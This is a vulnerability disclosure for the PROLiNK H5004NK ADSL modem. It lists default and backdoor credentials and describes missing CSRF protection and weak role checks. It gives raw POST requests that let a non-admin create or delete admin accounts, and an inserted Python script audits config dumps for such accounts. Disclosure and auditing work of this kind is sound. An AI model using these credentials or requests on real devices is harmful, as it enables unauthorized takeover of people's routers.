moften

PROLiNK H5004NK ADSL Wireless Modem Multiple Vulnerabilities

Oct 16th, 2015
# Exploit Title: [PROLiNK H5004NK ADSL Wireless Modem Multiple Vulnerabilities]
# Discovered by: Karn Ganeshen
# Reported on: [October 13, 2015]
# Vendor Response: [No process to handle vuln reports]
# Vendor Homepage: [http://www.prolink2u.com/newtemp/datacom/adsl-modem-router/381-h5004nk.html]
# Version Affected: [Firmware version R76S Slt 4WNE1 6.1R]


**Vulnerability Details**

*1. Default, weak passwords for HTTP and FTP services*

a. *HTTP accounts*
- admin/password
- user/user
- guest/XXXXairocon

<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="admin"/>
<V N="PASSWORD" V="password"/>
<V N="BACKDOOR" V="0x0"/>
<V N="PRIORITY" V="0x2"/>
</chain>

<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="user"/>
<V N="PASSWORD" V="user"/>
<V N="BACKDOOR" V="0x0"/>
<V N="PRIORITY" V="0x0"/>
</chain>

<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="XXXXairocon"/>
<V N="BACKDOOR" V="0x1"/>
<V N="PRIORITY" V="0x1"/>
</chain>

*XXXX -> last four digits of the MAC address*

b. *FTP accounts*

- admin/admin
- useradmin/useradmin
- user/user

<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="admin"/>
<V N="PASSWORD" V="admin"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x3"/>
<V N="INSTNUM" V="0x1"/>
</chain>

<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="useradmin"/>
<V N="PASSWORD" V="useradmin"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x2"/>
<V N="INSTNUM" V="0x2"/>
</chain>

<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="user"/>
<V N="PASSWORD" V="user"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x1"/>
<V N="INSTNUM" V="0x3"/>
</chain>


2. *Backdoor accounts*
The device comes configured with a privileged backdoor account.

For HTTP, 'guest', with attribute <V N="BACKDOOR" V="0x1"/>, is the backdoor
account. This is seen in the config file:

<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="XXXXairocon"/>
<V N="BACKDOOR" V="0x1"/>
<V N="PRIORITY" V="0x1"/>
</chain>

This user is not shown / visible in the user list when logged in as admin
(the privileged user).

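As an added example (not part of the advisory), the following Python script parses the <chain> entries from a config.img dump the way an owner auditing their own device would, and reports what sections 1 and 2 describe: backdoor-flagged logins, the default HTTP/FTP credentials, and priority-2 (admin) accounts that are absent from the user list the web UI shows (the hidden accounts of section 4). The sample config is constructed from the chains quoted above; "1A2B" stands in for the MAC digits and the "test" admin account is hypothetical.

```python
import re
import xml.etree.ElementTree as ET

# Default credentials listed in the advisory for the HTTP and FTP services.
DEFAULT_HTTP = {("admin", "password"), ("user", "user")}
DEFAULT_FTP = {("admin", "admin"), ("useradmin", "useradmin"), ("user", "user")}

# Constructed sample config: the chains quoted in the advisory, with "1A2B"
# standing in for the MAC digits, plus a hypothetical "test" admin account of
# the kind the weak RBAC check lets a non-admin user create.
SAMPLE_CONFIG = """
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/><V N="USERNAME" V="admin"/><V N="PASSWORD" V="password"/>
<V N="BACKDOOR" V="0x0"/><V N="PRIORITY" V="0x2"/></chain>
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/><V N="USERNAME" V="guest"/><V N="PASSWORD" V="1A2Bairocon"/>
<V N="BACKDOOR" V="0x1"/><V N="PRIORITY" V="0x1"/></chain>
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/><V N="USERNAME" V="test"/><V N="PASSWORD" V="test"/>
<V N="BACKDOOR" V="0x0"/><V N="PRIORITY" V="0x2"/></chain>
<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/><V N="USERNAME" V="admin"/><V N="PASSWORD" V="admin"/>
<V N="PORT" V="0x15"/><V N="USERRIGHT" V="0x3"/><V N="INSTNUM" V="0x1"/></chain>
"""

def parse_chains(config_text):
    """Return [(chain_name, {N: V})] from a dump of top-level <chain> blocks."""
    root = ET.fromstring("<root>" + config_text + "</root>")
    return [(c.get("N"), {v.get("N"): v.get("V") for v in c.findall("V")})
            for c in root.findall("chain")]

def audit_accounts(config_text, ui_user_list):
    """Flag backdoor, default-credential and hidden admin (priority 2) accounts.
    ui_user_list: usernames the admin web UI shows; a priority-2 account that is
    in the config but not in that list is an admin the UI hides."""
    findings = []
    for name, v in parse_chains(config_text):
        user, pw = v.get("USERNAME"), v.get("PASSWORD", "")
        if name == "USERNAME_PASSWORD":
            if v.get("BACKDOOR") == "0x1":
                findings.append(("backdoor", user))
            # guest's password is four MAC digits plus the fixed "airocon" suffix
            if (user, pw) in DEFAULT_HTTP or re.fullmatch(r".{4}airocon", pw):
                findings.append(("default-http-password", user))
            if int(v.get("PRIORITY", "0x0"), 16) == 2 and user not in ui_user_list:
                findings.append(("hidden-admin", user))
        elif name == "FTP_SERVER" and v.get("ENABLE") == "0x1":
            if (user, pw) in DEFAULT_FTP:
                findings.append(("default-ftp-password", user))
    return findings
```

Feed it the text of a downloaded config.img together with the usernames the admin UI lists; any "hidden-admin" or "backdoor" finding is an account that should not be there.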

3. *No CSRF protection*
No CSRF token is set in any of the forms / pages.

While a user is logged in, HTTP requests to the device can therefore be
silently triggered from another site.


4. *Weak RBAC controls*

5a) *A non-admin user (user) can create and delete any other users,
including root-privileged accounts.*

There are three users:

admin:password -> priv 2: super user account with full functional access
(admin/root)
user:user -> priv 0: can access only some functions (user)
guest:XXXXairocon -> privileged backdoor login


*Normally:*

- user can create new accounts with restricted user privileges only.
- user can change its own password and those of other non-admin users only.
- user can delete other non-admin users only.

However, the application does not enforce strict RBAC, and it is possible
for a non-admin user to create a new account with admin privileges.


This is done as follows:

1. Start creating a new user, and intercept the user creation POST request
2. Intercept & change the privilege parameter value from 0 (user) to 2 (admin)
- Submit request
3. When the new admin user is created successfully, it does not show up in
the user list
4. Confirm via logging in as the new admin, and / or via the configured
accounts in the configuration file (config.img)


This is the POST request to create a new user:

*Create user http request*:

POST /form2userconfig.cgi HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://<IP>/userconfig.htm?v=
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115

username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=


*Note1*: In some cases, this password change function is not accessible to
'user' via the GUI. But we can still send a POST request to create a valid,
new higher-privileged account.

*Note2*: In some cases, the application does not create the admin-privileged
user on the first attempt. However, on the 2nd or 3rd attempt the new user is
created without any issue.


*Delete user http request:*
A non-admin user can delete any configured user(s), including privileged
users (admin).

POST /form2userconfig.cgi HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://<IP>/userconfig.htm
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 131

username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%


When the (non-admin) user deletes the admin login (priv 2), the outcome can be
confirmed by checking the configuration file. When it deletes another user
login (priv 0), the outcome can be confirmed by checking the user list.


5b) *(non-admin priv) User can access unauthorized functions.*
Normally, 'user' does not have access to all the functionality of the
device. It has access to Status, Setup and Maintenance.

However, a few functions can still be accessed by calling them directly. For
example, the MAC filtering configuration can be opened directly at this URL:

http://<IP>/fw-macfilter.htm

Other functions may also be accessible in this manner.


6. *Sensitive information not secured from low privileged users*

A non-admin privileged user can download the configuration file, config.img.

This file contains clear-text passwords, keys and other sensitive
information which can be used to gain privileged access.


7. *Sensitive information accessible in clear-text*

Sensitive information like passwords and keys is not secured properly.
Mostly these are either shown in clear-text or censored as *****; in the
latter case it is possible to view the clear-text values locally via
'Inspect Element', by intercepting HTTP requests, or by sniffing.